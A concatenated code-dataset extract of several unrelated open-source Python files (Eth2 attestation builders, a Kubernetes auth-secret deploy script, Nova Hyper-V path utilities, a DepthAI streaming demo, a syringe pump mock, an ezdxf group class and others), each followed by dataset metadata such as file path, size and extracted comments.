aggregation_bits, aggregate_signature = aggregate_votes(
bitfield=get_empty_bitfield(len(committee)),
sigs=(),
voting_sigs=signatures,
attesting_indices=attesting_indices,
)
# create attestation from attestation_data, particpipant_bitfield, and signature
return Attestation(
aggregation_bits=aggregation_bits,
data=attestation_data,
custody_bits=Bitfield((False,) * len(aggregation_bits)),
signature=aggregate_signature,
)
# TODO(ralexstokes) merge in w/ ``get_committee_assignment``
def get_crosslink_committees_at_slot(
state: BeaconState, slot: Slot, config: Eth2Config
) -> Tuple[Tuple[Tuple[ValidatorIndex, ...], Shard], ...]:
epoch = compute_epoch_of_slot(slot, config.SLOTS_PER_EPOCH)
active_validators = get_active_validator_indices(state.validators, epoch)
committees_per_slot = (
get_committee_count(
len(active_validators),
config.SHARD_COUNT,
config.SLOTS_PER_EPOCH,
config.TARGET_COMMITTEE_SIZE,
)
// config.SLOTS_PER_EPOCH
)
results = []
offset = committees_per_slot * (slot % config.SLOTS_PER_EPOCH)
slot_start_shard = Shard(
(get_start_shard(state, epoch, CommitteeConfig(config)) + offset)
% config.SHARD_COUNT
)
for i in range(committees_per_slot):
shard = (slot_start_shard + i) % config.SHARD_COUNT
committee = get_crosslink_committee(
state, epoch, shard, CommitteeConfig(config)
)
results.append((committee, Shard(shard)))
return tuple(results)
def create_signed_attestation_at_slot(
state: BeaconState,
config: Eth2Config,
state_machine: BaseBeaconStateMachine,
attestation_slot: Slot,
beacon_block_root: Hash32,
validator_privkeys: Dict[ValidatorIndex, int],
committee: Tuple[ValidatorIndex, ...],
shard: Shard,
) -> Attestation:
"""
Create the attestations of the given ``attestation_slot`` slot with ``validator_privkeys``.
"""
state_transition = state_machine.state_transition
state = state_transition.apply_state_transition(state, future_slot=attestation_slot)
target_epoch = compute_epoch_of_slot(attestation_slot, config.SLOTS_PER_EPOCH)
target_root = _get_target_root(state, config, beacon_block_root)
parent_crosslink = state.current_crosslinks[shard]
attestation_data = AttestationData(
beacon_block_root=beacon_block_root,
source=Checkpoint(
epoch=state.current_justified_checkpoint.epoch,
root=state.current_justified_checkpoint.root,
),
target=Checkpoint(root=target_root, epoch=target_epoch),
crosslink=Crosslink(
shard=shard,
parent_root=parent_crosslink.hash_tree_root,
start_epoch=parent_crosslink.end_epoch,
end_epoch=target_epoch,
),
)
return _create_mock_signed_attestation(
state,
attestation_data,
attestation_slot,
committee,
len(committee),
keymapper(lambda index: state.validators[index].pubkey, validator_privkeys),
config.SLOTS_PER_EPOCH,
)
@to_tuple
def create_mock_signed_attestations_at_slot(
state: BeaconState,
config: Eth2Config,
state_machine: BaseBeaconStateMachine,
attestation_slot: Slot,
beacon_block_root: Hash32,
keymap: Dict[BLSPubkey, int],
voted_attesters_ratio: float = 1.0,
) -> Iterable[Attestation]:
"""
Create the mocking attestations of the given ``attestation_slot`` slot with ``keymap``.
"""
crosslink_committees_at_slot = get_crosslink_committees_at_slot(
state, attestation_slot, config
)
# Get `target_root`
target_root = _get_target_root(state, config, beacon_block_root)
target_epoch = compute_epoch_of_slot(state.slot, config.SLOTS_PER_EPOCH)
for crosslink_committee in crosslink_committees_at_slot:
committee, shard = crosslink_committee
parent_crosslink = state.current_crosslinks[shard]
attestation_data = AttestationData(
beacon_block_root=beacon_block_root,
source=Checkpoint(
epoch=state.current_justified_checkpoint.epoch,
root=state.current_justified_checkpoint.root,
),
target=Checkpoint(root=target_root, epoch=target_epoch),
crosslink=Crosslink(
shard=shard,
parent_root=parent_crosslink.hash_tree_root,
start_epoch=parent_crosslink.end_epoch,
end_epoch=min(
target_epoch,
parent_crosslink.end_epoch + config.MAX_EPOCHS_PER_CROSSLINK,
),
),
)
num_voted_attesters = int(len(committee) * voted_attesters_ratio)
yield _create_mock_signed_attestation(
state,
attestation_data,
attestation_slot,
committee,
num_voted_attesters,
keymap,
config.SLOTS_PER_EPOCH,
)
#
# VoluntaryExit
#
def create_mock_voluntary_exit(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
validator_index: ValidatorIndex,
exit_epoch: Epoch = None,
) -> VoluntaryExit:
current_epoch = state.current_epoch(config.SLOTS_PER_EPOCH)
target_epoch = current_epoch if exit_epoch is None else exit_epoch
voluntary_exit = VoluntaryExit(epoch=target_epoch, validator_index=validator_index)
return voluntary_exit.copy(
signature=sign_transaction(
message_hash=voluntary_exit.signing_root,
privkey=keymap[state.validators[validator_index].pubkey],
state=state,
slot=compute_start_slot_of_epoch(target_epoch, config.SLOTS_PER_EPOCH),
signature_domain=SignatureDomain.DOMAIN_VOLUNTARY_EXIT,
slots_per_epoch=config.SLOTS_PER_EPOCH,
)
)
#
# Deposit
#
def create_mock_deposit_data(
*,
config: Eth2Config,
pubkey: BLSPubkey,
privkey: int,
withdrawal_credentials: Hash32,
amount: Gwei = None
) -> DepositData:
if amount is None:
amount = config.MAX_EFFECTIVE_BALANCE
data = DepositData(
pubkey=pubkey, withdrawal_credentials=withdrawal_credentials, amount=amount
)
signature = sign_proof_of_possession(deposit_data=data, privkey=privkey)
return data.copy(signature=signature)
| eth2/beacon/tools/builder/validator.py | 21,728 | Create a mocking attestation of the given ``attestation_data`` slot with ``keymap``.
Get ``message_hash`` and voting indices of the given ``committee``.
Aggregate the votes.
Return a `ProposerSlashing` derived from the given block roots.
If the header roots do not match, the `ProposerSlashing` is valid.
If the header roots do match, the `ProposerSlashing` is not valid.
Create the mocking attestations of the given ``attestation_slot`` slot with ``keymap``.
Create an `IndexedAttestation` that is signed by one attester.
Create the attestations of the given ``attestation_slot`` slot with ``validator_privkeys``.
Verify the given votes.
TODO(ralexstokes) merge w/ below Aggregation Update the bitfield and append the signatures Signer Only for test/simulation ProposerSlashing AttesterSlashing Use genesis block root as `beacon_block_root`, only for tests. Get `target_root` Get `source_root` target_epoch_2 < target_epoch_1 source_epoch_1 < source_epoch_2 Attestation Use privkeys to sign the attestation aggregate signatures and construct participant bitfield create attestation from attestation_data, particpipant_bitfield, and signature TODO(ralexstokes) merge in w/ ``get_committee_assignment`` Get `target_root` VoluntaryExit Deposit | 1,244 | en | 0.688763 |
import base64
import deployment_options
import os
import tempfile
import utils
def render_file(namespace, private_key, public_key):
src_file = os.path.join(os.getcwd(), 'deploy/assisted-installer-local-auth.yaml')
dst_file = os.path.join(os.getcwd(), 'build', namespace, 'assisted-installer-local-auth.yaml')
with open(src_file, "r") as src:
with open(dst_file, "w+") as dst:
data = src.read()
data = data.replace('REPLACE_NAMESPACE', f'"{namespace}"')
data = data.replace('REPLACE_PRIVATE_KEY', f'"{private_key}"')
data = data.replace('REPLACE_PUBLIC_KEY', f'"{public_key}"')
print("Deploying {}".format(dst_file))
dst.write(data)
return dst_file
def encoded_contents(filename):
with open(filename, 'r') as f:
return base64.b64encode(bytearray(f.read(), 'utf-8')).decode('utf-8')
def main():
deploy_options = deployment_options.load_deployment_options()
utils.verify_build_directory(deploy_options.namespace)
# Render a file without values for the operator as we don't want every deployment to have the same values
if not deploy_options.apply_manifest:
render_file(deploy_options.namespace, "", "")
return
secret_name = 'assisted-installer-local-auth-key'
exists = utils.check_if_exists(
"secret",
secret_name,
target=deploy_options.target,
namespace=deploy_options.namespace,
profile=deploy_options.profile
)
if exists:
print(f'Secret {secret_name} already exists in namespace {deploy_options.namespace}')
return
output_dir = tempfile.TemporaryDirectory()
priv_path = os.path.join(output_dir.name, f'ec-private-key.pem')
pub_path = os.path.join(output_dir.name, f'ec-public-key.pem')
print(utils.check_output(f'openssl ecparam -name prime256v1 -genkey -noout -out {priv_path}'))
print(utils.check_output(f'openssl ec -in {priv_path} -pubout -out {pub_path}'))
secret_file = render_file(deploy_options.namespace, encoded_contents(priv_path), encoded_contents(pub_path))
utils.apply(
target=deploy_options.target,
namespace=deploy_options.namespace,
profile=deploy_options.profile,
file=secret_file
)
if __name__ == "__main__":
main()
| tools/deploy_local_auth_secret.py | 2,329 | Render a file without values for the operator as we don't want every deployment to have the same values | 103 | en | 0.956093 |
# -*- coding: utf-8 -*-
data = ''
with open('input.txt') as f:
data = f.read().strip()
def Reacts(a, b):
if a == b:
return False
if a.lower() == b or b.lower() == a:
return True
return False
def Collapse(polymer):
i = 1
while i < len(polymer):
if Reacts(polymer[i - 1], polymer[i]):
del(polymer[i-1])
del(polymer[i-1])
i = i - 2
i += 1
return polymer
#data = 'bbbbAaccc'
polymer = list(data)
p_c = Collapse(polymer)
print(len(p_c))
alphabet = 'abcdefghijklmnopqrstuvwxyz'
len_min = len(polymer)
for l in alphabet:
filtered_data = data.replace(l, '').replace(l.upper(), '')
polymer = list(filtered_data)
p_c = Collapse(polymer)
print(l, len(p_c))
if len(p_c) < len_min:
len_min = len(p_c)
print(len_min) | 05/aoc05.py | 911 | -*- coding: utf-8 -*-data = 'bbbbAaccc' | 39 | en | 0.603952 |
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import sys
if sys.platform == 'win32':
import wmi
from oslo_config import cfg
from nova.i18n import _
from nova.openstack.common import log as logging
from nova import utils
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
LOG = logging.getLogger(__name__)
hyperv_opts = [
cfg.StrOpt('instances_path_share',
default="",
help='The name of a Windows share name mapped to the '
'"instances_path" dir and used by the resize feature '
'to copy files to the target host. If left blank, an '
'administrative share will be used, looking for the same '
'"instances_path" used locally'),
]
CONF = cfg.CONF
CONF.register_opts(hyperv_opts, 'hyperv')
CONF.import_opt('instances_path', 'nova.compute.manager')
ERROR_INVALID_NAME = 123
class PathUtils(object):
def __init__(self):
self._smb_conn = wmi.WMI(moniker=r"root\Microsoft\Windows\SMB")
def open(self, path, mode):
"""Wrapper on __builtin__.open used to simplify unit testing."""
import __builtin__
return __builtin__.open(path, mode)
def exists(self, path):
return os.path.exists(path)
def makedirs(self, path):
os.makedirs(path)
def remove(self, path):
os.remove(path)
def rename(self, src, dest):
os.rename(src, dest)
def copyfile(self, src, dest):
self.copy(src, dest)
def copy(self, src, dest):
# With large files this is 2x-3x faster than shutil.copy(src, dest),
# especially when copying to a UNC target.
# shutil.copyfileobj(...) with a proper buffer is better than
# shutil.copy(...) but still 20% slower than a shell copy.
# It can be replaced with Win32 API calls to avoid the process
# spawning overhead.
output, ret = utils.execute('cmd.exe', '/C', 'copy', '/Y', src, dest)
if ret:
raise IOError(_('The file copy from %(src)s to %(dest)s failed')
% {'src': src, 'dest': dest})
def rmtree(self, path):
shutil.rmtree(path)
def get_instances_dir(self, remote_server=None):
local_instance_path = os.path.normpath(CONF.instances_path)
if remote_server:
if CONF.hyperv.instances_path_share:
path = CONF.hyperv.instances_path_share
else:
# Use an administrative share
path = local_instance_path.replace(':', '$')
return ('\\\\%(remote_server)s\\%(path)s' %
{'remote_server': remote_server, 'path': path})
else:
return local_instance_path
def _check_create_dir(self, path):
if not self.exists(path):
LOG.debug('Creating directory: %s', path)
self.makedirs(path)
def _check_remove_dir(self, path):
if self.exists(path):
LOG.debug('Removing directory: %s', path)
self.rmtree(path)
def _get_instances_sub_dir(self, dir_name, remote_server=None,
create_dir=True, remove_dir=False):
instances_path = self.get_instances_dir(remote_server)
path = os.path.join(instances_path, dir_name)
try:
if remove_dir:
self._check_remove_dir(path)
if create_dir:
self._check_create_dir(path)
return path
except WindowsError as ex:
if ex.winerror == ERROR_INVALID_NAME:
raise vmutils.HyperVException(_(
"Cannot access \"%(instances_path)s\", make sure the "
"path exists and that you have the proper permissions. "
"In particular Nova-Compute must not be executed with the "
"builtin SYSTEM account or other accounts unable to "
"authenticate on a remote host.") %
{'instances_path': instances_path})
raise
def get_instance_migr_revert_dir(self, instance_name, create_dir=False,
remove_dir=False):
dir_name = '%s_revert' % instance_name
return self._get_instances_sub_dir(dir_name, None, create_dir,
remove_dir)
def get_instance_dir(self, instance_name, remote_server=None,
create_dir=True, remove_dir=False):
return self._get_instances_sub_dir(instance_name, remote_server,
create_dir, remove_dir)
def _lookup_vhd_path(self, instance_name, vhd_path_func):
vhd_path = None
for format_ext in ['vhd', 'vhdx']:
test_path = vhd_path_func(instance_name, format_ext)
if self.exists(test_path):
vhd_path = test_path
break
return vhd_path
def lookup_root_vhd_path(self, instance_name):
return self._lookup_vhd_path(instance_name, self.get_root_vhd_path)
def lookup_configdrive_path(self, instance_name):
configdrive_path = None
for format_ext in constants.DISK_FORMAT_MAP:
test_path = self.get_configdrive_path(instance_name, format_ext)
if self.exists(test_path):
configdrive_path = test_path
break
return configdrive_path
def lookup_ephemeral_vhd_path(self, instance_name):
return self._lookup_vhd_path(instance_name,
self.get_ephemeral_vhd_path)
def get_root_vhd_path(self, instance_name, format_ext):
instance_path = self.get_instance_dir(instance_name)
return os.path.join(instance_path, 'root.' + format_ext.lower())
def get_configdrive_path(self, instance_name, format_ext):
instance_path = self.get_instance_dir(instance_name)
return os.path.join(instance_path, 'configdrive.' + format_ext.lower())
def get_ephemeral_vhd_path(self, instance_name, format_ext):
instance_path = self.get_instance_dir(instance_name)
return os.path.join(instance_path, 'ephemeral.' + format_ext.lower())
def get_base_vhd_dir(self):
return self._get_instances_sub_dir('_base')
def get_export_dir(self, instance_name):
dir_name = os.path.join('export', instance_name)
return self._get_instances_sub_dir(dir_name, create_dir=True,
remove_dir=True)
def get_vm_console_log_paths(self, vm_name, remote_server=None):
instance_dir = self.get_instance_dir(vm_name,
remote_server)
console_log_path = os.path.join(instance_dir, 'console.log')
return console_log_path, console_log_path + '.1'
def check_smb_mapping(self, smbfs_share):
mappings = self._smb_conn.Msft_SmbMapping(RemotePath=smbfs_share)
if not mappings:
return False
if os.path.exists(smbfs_share):
LOG.debug('Share already mounted: %s', smbfs_share)
return True
else:
LOG.debug('Share exists but is unavailable: %s ', smbfs_share)
self.unmount_smb_share(smbfs_share, force=True)
return False
def mount_smb_share(self, smbfs_share, username=None, password=None):
try:
LOG.debug('Mounting share: %s', smbfs_share)
self._smb_conn.Msft_SmbMapping.Create(RemotePath=smbfs_share,
UserName=username,
Password=password)
except wmi.x_wmi as exc:
err_msg = (_(
'Unable to mount SMBFS share: %(smbfs_share)s '
'WMI exception: %(wmi_exc)s'), {'smbfs_share': smbfs_share,
'wmi_exc': exc})
raise vmutils.HyperVException(err_msg)
def unmount_smb_share(self, smbfs_share, force=False):
mappings = self._smb_conn.Msft_SmbMapping(RemotePath=smbfs_share)
if not mappings:
LOG.debug('Share %s is not mounted. Skipping unmount.',
smbfs_share)
for mapping in mappings:
# Due to a bug in the WMI module, getting the output of
# methods returning None will raise an AttributeError
try:
mapping.Remove(Force=force)
except AttributeError:
pass
except wmi.x_wmi:
# If this fails, a 'Generic Failure' exception is raised.
# This happens even if we unforcefully unmount an in-use
# share, for which reason we'll simply ignore it in this
# case.
if force:
raise vmutils.HyperVException(
_("Could not unmount share: %s"), smbfs_share)
| nova/virt/hyperv/pathutils.py | 9,588 | Wrapper on __builtin__.open used to simplify unit testing.
Copyright 2013 Cloudbase Solutions Srl All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. With large files this is 2x-3x faster than shutil.copy(src, dest), especially when copying to a UNC target. shutil.copyfileobj(...) with a proper buffer is better than shutil.copy(...) but still 20% slower than a shell copy. It can be replaced with Win32 API calls to avoid the process spawning overhead. Use an administrative share Due to a bug in the WMI module, getting the output of methods returning None will raise an AttributeError If this fails, a 'Generic Failure' exception is raised. This happens even if we unforcefully unmount an in-use share, for which reason we'll simply ignore it in this case. | 1,281 | en | 0.866854 |
"""
Module for all Form Tests.
"""
import pytest
from django.utils.translation import gettext_lazy as _
from djcutter.users.forms import UserCreationForm
from djcutter.users.models import User
pytestmark = pytest.mark.django_db
class TestUserCreationForm:
"""
Test class for all tests related to the UserCreationForm
"""
def test_username_validation_error_msg(self, user: User):
"""
Tests UserCreation Form's unique validator functions correctly by testing:
1) A new user with an existing username cannot be added.
2) Only 1 error is raised by the UserCreation Form
3) The desired error message is raised
"""
# The user already exists,
# hence cannot be created.
form = UserCreationForm(
{
"username": user.username,
"password1": user.password,
"password2": user.password,
}
)
assert not form.is_valid()
assert len(form.errors) == 1
assert "username" in form.errors
assert form.errors["username"][0] == _("This username has already been taken.")
| djcutter/users/tests/test_forms.py | 1,165 | Test class for all tests related to the UserCreationForm
Tests UserCreation Form's unique validator functions correctly by testing:
1) A new user with an existing username cannot be added.
2) Only 1 error is raised by the UserCreation Form
3) The desired error message is raised
Module for all Form Tests.
The user already exists, hence cannot be created. | 369 | en | 0.84332 |
#!/usr/bin/env python3
import depthai as dai
import subprocess as sp
from os import name as osName
# Create pipeline
pipeline = dai.Pipeline()
# Define sources and output
camRgb = pipeline.createColorCamera()
videoEnc = pipeline.createVideoEncoder()
xout = pipeline.createXLinkOut()
xout.setStreamName("h264")
# Properties
camRgb.setBoardSocket(dai.CameraBoardSocket.RGB)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_4_K)
videoEnc.setDefaultProfilePreset(camRgb.getVideoSize(), camRgb.getFps(), dai.VideoEncoderProperties.Profile.H264_MAIN)
# Linking
camRgb.video.link(videoEnc.input)
videoEnc.bitstream.link(xout.input)
width, height = 720, 500
command = [
"ffplay",
"-i", "-",
"-x", str(width),
"-y", str(height),
"-framerate", "60",
"-fflags", "nobuffer",
"-flags", "low_delay",
"-framedrop",
"-strict", "experimental"
]
if osName == "nt": # Running on Windows
command = ["cmd", "/c"] + command
try:
proc = sp.Popen(command, stdin=sp.PIPE) # Start the ffplay process
except:
exit("Error: cannot run ffplay!\nTry running: sudo apt install ffmpeg")
# Connect to device and start pipeline
with dai.Device(pipeline) as device:
# Output queue will be used to get the encoded data from the output defined above
q = device.getOutputQueue(name="h264", maxSize=30, blocking=True)
try:
while True:
data = q.get().getData() # Blocking call, will wait until new data has arrived
proc.stdin.write(data)
except:
pass
proc.stdin.close()
| gen2-play-encoded-stream/main.py | 1,571 | !/usr/bin/env python3 Create pipeline Define sources and output Properties Linking Running on Windows Start the ffplay process Connect to device and start pipeline Output queue will be used to get the encoded data from the output defined above Blocking call, will wait until new data has arrived | 295 | en | 0.797659 |
# https://github.com/TrustyJAID/Trusty-cogs/blob/master/notsobot/converter.py
import re
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
from redbot.core.i18n import Translator
_ = Translator("ReverseImageSearch", __file__)
IMAGE_LINKS = re.compile(
r"(https?://[^\"\'\s]*\.(?:png|jpg|jpeg|gif|svg)(\?size=[0-9]*)?)", flags=re.I
)
EMOJI_REGEX = re.compile(r"(<(a)?:[a-zA-Z0-9_]+:([0-9]+)>)")
MENTION_REGEX = re.compile(r"<@!?([0-9]+)>")
ID_REGEX = re.compile(r"[0-9]{17,}")
class ImageFinder(Converter):
"""
This is a class to convert notsobots image searching capabilities
into a more general converter class
"""
async def convert(self, ctx, argument):
attachments = ctx.message.attachments
mentions = MENTION_REGEX.finditer(argument)
matches = IMAGE_LINKS.finditer(argument)
emojis = EMOJI_REGEX.finditer(argument)
ids = ID_REGEX.finditer(argument)
urls = []
if matches:
for match in matches:
# print(match.group(1))
urls.append(match.group(1))
if emojis:
for emoji in emojis:
ext = "gif" if emoji.group(2) else "png"
url = "https://cdn.discordapp.com/emojis/{id}.{ext}?v=1".format(
id=emoji.group(3), ext=ext
)
urls.append(url)
if mentions:
for mention in mentions:
user = ctx.guild.get_member(int(mention.group(1)))
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if not urls and ids:
for possible_id in ids:
user = ctx.guild.get_member(int(possible_id.group(0)))
if user:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if attachments:
for attachment in attachments:
urls.append(attachment.url)
if not urls:
ctx.command.reset_cooldown(ctx)
raise BadArgument(_("No images provided."))
return urls
async def search_for_images(self, ctx):
urls = []
async for message in ctx.channel.history(limit=10):
if message.attachments:
for attachment in message.attachments:
urls.append(attachment.url)
match = IMAGE_LINKS.match(message.content)
if match:
urls.append(match.group(1))
if not urls:
ctx.command.reset_cooldown(ctx)
raise ValueError(_("No Images found in recent history."))
return urls
| reverseimagesearch/converters.py | 3,075 | This is a class to convert notsobots image searching capabilities
into a more general converter class
https://github.com/TrustyJAID/Trusty-cogs/blob/master/notsobot/converter.py print(match.group(1)) | 201 | en | 0.641046 |
import titration.utils.analysis as analysis
import titration.utils.constants as constants
import titration.utils.devices.serial_mock as serial_mock
import titration.utils.interfaces as interfaces
class Syringe_Pump:
def __init__(self):
self.serial = serial_mock.Serial(
port=constants.ARDUINO_PORT,
baudrate=constants.ARDUINO_BAUD,
timeout=constants.ARDUINO_TIMEOUT,
)
self.volume_in_pump = constants.volume_in_pump
self.max_pump_capacity = constants.MAX_PUMP_CAPACITY
def set_volume_in_pump(self, volume):
self.volume_in_pump = volume
constants.volume_in_pump = volume
def get_volume_in_pump(self):
return self.volume_in_pump
def pump_volume(self, volume, direction):
volume_to_add = volume
# pull in solution
if direction == 0:
# check if volume to add is greater than space left
space_in_pump = self.max_pump_capacity - self.volume_in_pump
if volume_to_add > space_in_pump:
volume_to_add = self.max_pump_capacity - self.volume_in_pump
self.drive_pump(volume_to_add, direction)
# pump out solution
elif direction == 1:
# volume greater than max capacity of pump
if volume_to_add > self.max_pump_capacity:
interfaces.lcd_out(
"Volume > pumpable", style=constants.LCD_CENT_JUST, line=4
)
# pump out all current volume
next_volume = self.volume_in_pump
self.drive_pump(next_volume, 1)
# calculate new volume to add
volume_to_add = volume_to_add - next_volume
# keep pumping until full volume_to_add is met
while volume_to_add > 0:
next_volume = min(volume_to_add, self.max_pump_capacity)
self.drive_pump(next_volume, 0)
self.drive_pump(next_volume, 1)
volume_to_add -= next_volume
# volume greater than volume in pump
elif volume_to_add > self.volume_in_pump:
next_volume = self.volume_in_pump
self.drive_pump(next_volume, 1)
# calculate remaining volume to add
volume_to_add -= next_volume
self.drive_pump(volume_to_add, 0)
self.drive_pump(volume_to_add, 1)
else:
# volume less than volume in pump
self.drive_pump(volume_to_add, direction)
def drive_pump(self, volume, direction):
"""Converts volume to cycles and ensures and checks pump level and values"""
if direction == 0:
space_in_pump = self.max_pump_capacity - self.volume_in_pump
if volume > space_in_pump:
interfaces.lcd_out("Filling Error", line=4)
else:
interfaces.lcd_out("Filling {0:1.2f} ml".format(volume), line=4)
cycles = analysis.determine_pump_cycles(volume)
self.drive_step_stick(cycles, direction)
self.volume_in_pump += volume
elif direction == 1:
if volume > self.volume_in_pump:
interfaces.lcd_out("Pumping Error", line=4)
else:
interfaces.lcd_out("Pumping {0:1.2f} ml".format(volume), line=4)
cycles = analysis.determine_pump_cycles(volume)
offset = self.drive_step_stick(cycles, direction)
# offset is what is returned from drive_step_stick which originally is returned from the arduino
if offset != 0:
self.drive_step_stick(offset, 0)
self.drive_step_stick(offset, 1)
self.volume_in_pump -= volume
interfaces.lcd_out("Pump Vol: {0:1.2f} ml".format(self.volume_in_pump), line=4)
def drive_step_stick(self, cycles, direction):
"""
cycles and direction are integers
Communicates with arduino to add HCl through pump
:param cycles: number of rising edges for the pump
:param direction: direction of pump
"""
if cycles == 0:
return 0
if self.serial.writable():
self.serial.write(cycles.to_bytes(4, "little"))
self.serial.write(direction.to_bytes(1, "little"))
self.serial.flush()
temp = self.serial.readline()
if temp == b"DONE\r\n" or temp == b"":
return 0
else:
return int(temp)
else:
interfaces.lcd_out("Arduino Unavailable", 4, constants.LCD_CENT_JUST)
| titration/utils/devices/syringe_pump_mock.py | 4,723 | Converts volume to cycles and ensures and checks pump level and values
cycles and direction are integers
Communicates with arduino to add HCl through pump
:param cycles: number of rising edges for the pump
:param direction: direction of pump
pull in solution check if volume to add is greater than space left pump out solution volume greater than max capacity of pump pump out all current volume calculate new volume to add keep pumping until full volume_to_add is met volume greater than volume in pump calculate remaining volume to add volume less than volume in pump offset is what is returned from drive_step_stick which originally is returned from the arduino | 666 | en | 0.900069 |
# Copyright (c) 2019-2020, Manfred Moitzi
# License: MIT-License
from typing import TYPE_CHECKING, Iterable, cast, Union, List, Set
from contextlib import contextmanager
import logging
from ezdxf.lldxf import validator, const
from ezdxf.lldxf.attributes import (
DXFAttr, DXFAttributes, DefSubclass, RETURN_DEFAULT, group_code_mapping,
)
from ezdxf.audit import AuditError
from .dxfentity import base_class, SubclassProcessor, DXFEntity
from .dxfobj import DXFObject
from .factory import register_entity
from .objectcollection import ObjectCollection
logger = logging.getLogger('ezdxf')
if TYPE_CHECKING:
from ezdxf.eztypes import (
TagWriter, Drawing, DXFNamespace, Auditor, EntityDB,
)
__all__ = ['DXFGroup', 'GroupCollection']
acdb_group = DefSubclass('AcDbGroup', {
# Group description
'description': DXFAttr(300, default=''),
# 1 = Unnamed
# 0 = Named
'unnamed': DXFAttr(
70, default=1, validator=validator.is_integer_bool,
fixer=RETURN_DEFAULT,
),
# 1 = Selectable
# 0 = Not selectable
'selectable': DXFAttr(
71, default=1,
validator=validator.is_integer_bool,
fixer=RETURN_DEFAULT,
),
# 340: Hard-pointer handle to entity in group (one entry per object)
})
acdb_group_group_codes = group_code_mapping(acdb_group)
GROUP_ITEM_CODE = 340
@register_entity
class DXFGroup(DXFObject):
""" Groups are not allowed in block definitions, and each entity can only
reside in one group, so cloning of groups creates also new entities.
"""
DXFTYPE = 'GROUP'
DXFATTRIBS = DXFAttributes(base_class, acdb_group)
def __init__(self):
super().__init__()
self._handles: Set[str] = set() # only needed at the loading stage
self._data: List[DXFEntity] = []
def copy(self):
raise const.DXFTypeError('Copying of GROUP not supported.')
def load_dxf_attribs(self,
processor: SubclassProcessor = None) -> 'DXFNamespace':
dxf = super().load_dxf_attribs(processor)
if processor:
tags = processor.fast_load_dxfattribs(
dxf, acdb_group_group_codes, 1, log=False)
self.load_group(tags)
return dxf
def load_group(self, tags):
for code, value in tags:
if code == GROUP_ITEM_CODE:
# First store handles, because at this point, objects
# are not stored in the EntityDB:
self._handles.add(value)
def preprocess_export(self, tagwriter: 'TagWriter') -> bool:
self.purge(self.doc.entitydb)
return True # export even empty groups
def export_entity(self, tagwriter: 'TagWriter') -> None:
""" Export entity specific data as DXF tags. """
super().export_entity(tagwriter)
tagwriter.write_tag2(const.SUBCLASS_MARKER, acdb_group.name)
self.dxf.export_dxf_attribs(tagwriter, [
'description', 'unnamed', 'selectable'])
self.export_group(tagwriter)
def export_group(self, tagwriter: 'TagWriter'):
for entity in self._data:
tagwriter.write_tag2(GROUP_ITEM_CODE, entity.dxf.handle)
def __iter__(self) -> Iterable[DXFEntity]:
""" Iterate over all DXF entities in :class:`DXFGroup` as instances of
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
"""
return (e for e in self._data if e.is_alive)
def __len__(self) -> int:
""" Returns the count of DXF entities in :class:`DXFGroup`. """
return len(self._data)
def __getitem__(self, item):
""" Returns entities by standard Python indexing and slicing. """
return self._data[item]
def __contains__(self, item: Union[str, DXFEntity]) -> bool:
""" Returns ``True`` if item is in :class:`DXFGroup`. `item` has to be
a handle string or an object of type :class:`DXFEntity` or inherited.
"""
handle = item if isinstance(item, str) else item.dxf.handle
return handle in set(self.handles())
def handles(self) -> Iterable[str]:
""" Iterable of handles of all DXF entities in :class:`DXFGroup`. """
return (entity.dxf.handle for entity in self)
def post_load_hook(self, doc: 'Drawing') -> None:
super().post_load_hook(doc)
db_get = doc.entitydb.get
def entities():
for handle in self._handles:
entity = db_get(handle)
if entity and entity.is_alive:
yield entity
try:
self.set_data(entities())
except const.DXFStructureError as e:
logger.error(str(e))
del self._handles # all referenced entities are stored in _data
@contextmanager
def edit_data(self) -> List[DXFEntity]:
""" Context manager which yields all the group entities as
standard Python list::
with group.edit_data() as data:
# add new entities to a group
data.append(modelspace.add_line((0, 0), (3, 0)))
# remove last entity from a group
data.pop()
"""
data = list(self)
yield data
self.set_data(data)
def set_data(self, entities: Iterable[DXFEntity]) -> None:
""" Set `entities` as new group content, entities should be an iterable
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
Raises :class:`DXFValueError` if not all entities be on the same layout
(modelspace or any paperspace layout but not block)
"""
entities = list(entities)
if not all_entities_on_same_layout(entities):
raise const.DXFStructureError(
"All entities have to be in the same layout and are not allowed"
" to be in a block layout."
)
self.clear()
self._data = entities
def extend(self, entities: Iterable[DXFEntity]) -> None:
""" Add `entities` to :class:`DXFGroup`. """
self._data.extend(entities)
def clear(self) -> None:
""" Remove all entities from :class:`DXFGroup`, does not delete any
drawing entities referenced by this group.
"""
self._data = []
def audit(self, auditor: 'Auditor') -> None:
""" Remove invalid handles from :class:`DXFGroup`.
Invalid handles are: deleted entities, not all entities in the same
layout or entities in a block layout.
"""
# Remove destroyed or invalid entities:
self.purge(auditor.entitydb)
if not all_entities_on_same_layout(self._data):
auditor.fixed_error(
code=AuditError.GROUP_ENTITIES_IN_DIFFERENT_LAYOUTS,
message=f'Cleared {str(self)}, not all entities are located in '
f'the same layout.',
)
self.clear()
def _has_valid_owner(self, entity, db: 'EntityDB') -> bool:
